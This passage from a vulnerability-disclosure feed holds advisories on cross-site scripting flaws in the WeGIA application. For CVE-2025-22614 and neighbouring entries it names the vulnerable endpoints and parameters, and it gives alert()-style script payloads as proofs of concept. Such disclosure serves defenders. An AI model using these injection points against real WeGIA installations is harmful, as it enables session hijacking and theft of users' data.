&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22613/402279333-98da3af8-8399-473c-8d41-a9b4dac048c6.png&amp;#34;
	width=&amp;#34;823&amp;#34;
	height=&amp;#34;329&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22613/402279333-98da3af8-8399-473c-8d41-a9b4dac048c6_hu_7f238cf8b0211445.png 480w, /p/cve-2025-22613/402279333-98da3af8-8399-473c-8d41-a9b4dac048c6_hu_84bd6de71a116271.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;250&amp;#34;
		data-flex-basis=&amp;#34;600px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22613/402279334-d7d04cc8-f50d-4f1b-9978-192fb9210160.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;151&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22613/402279334-d7d04cc8-f50d-4f1b-9978-192fb9210160_hu_338e149e8a37e9eb.png 480w, /p/cve-2025-22613/402279334-d7d04cc8-f50d-4f1b-9978-192fb9210160_hu_f10658a576682b25.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;533&amp;#34;
		data-flex-basis=&amp;#34;1279px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-fhpx-54ch-ccxh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-fhpx-54ch-ccxh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;code&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22614</title>
        <link>https://www.cvehunters.com/p/cve-2025-22614/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22614/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22614-cross-site-scripting-xss-stored-endpoint-dependente_editarinfopessoalphp-parameters-nome-and-sobrenomeform&amp;#34;&amp;gt;CVE-2025-22614: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; parameters &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22614&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22614&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22614-cross-site-scripting-xss-stored-endpoint-dependente_editarinfopessoalphp-parameters-nome-and-sobrenomeform&amp;#34;&amp;gt;CVE-2025-22614: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; parameters &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22614&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22614&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;SobrenomeForm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22614/402263996-0dc9369b-0906-495e-bf27-3ef10a308c40.png&amp;#34;
	width=&amp;#34;932&amp;#34;
	height=&amp;#34;396&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22614/402263996-0dc9369b-0906-495e-bf27-3ef10a308c40_hu_cce60f360bd4be85.png 480w, /p/cve-2025-22614/402263996-0dc9369b-0906-495e-bf27-3ef10a308c40_hu_2bb4314fbc8a3c83.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;235&amp;#34;
		data-flex-basis=&amp;#34;564px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22614/402262348-475ba360-6014-4b73-8581-c1909da8ccc4.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;208&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22614/402262348-475ba360-6014-4b73-8581-c1909da8ccc4_hu_e383c719baa38c71.png 480w, /p/cve-2025-22614/402262348-475ba360-6014-4b73-8581-c1909da8ccc4_hu_fa90d728b9bcefea.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;387&amp;#34;
		data-flex-basis=&amp;#34;930px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wr55-2952-79rh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wr55-2952-79rh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;code&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22615</title>
        <link>https://www.cvehunters.com/p/cve-2025-22615/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22615/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22615-cross-site-scripting-xss-reflected-endpoint-cadastro_atendidophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-22615: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22615&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22615&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22615-cross-site-scripting-xss-reflected-endpoint-cadastro_atendidophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-22615: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22615&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22615&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
